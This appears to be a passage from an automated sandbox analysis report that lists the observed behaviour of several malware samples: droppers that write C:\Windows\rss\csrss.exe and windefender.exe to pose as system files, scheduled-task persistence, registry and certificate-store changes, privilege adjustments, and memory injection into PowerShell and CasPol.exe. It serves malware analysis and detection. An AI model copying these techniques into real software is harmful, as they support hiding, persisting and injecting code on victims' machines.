File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\u318.0.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u318.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u318.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u318.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u318.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u318.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-52 = "Greenland Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2412 = "Marquesas Standard Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-435 = "Georgian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2341 = "Haiti Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2372 = "Easter Island Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
N/A N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\7nW5qIMaV8xajTNolXyNnr62.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\VaEY2hreTfB69fav3nHOe8uJ.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\BvKx9NZLLBJyqhaHtH6KEhmS.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\xelY93icznpSl0utJlO9CTlz.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2272 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 5068 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2272 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
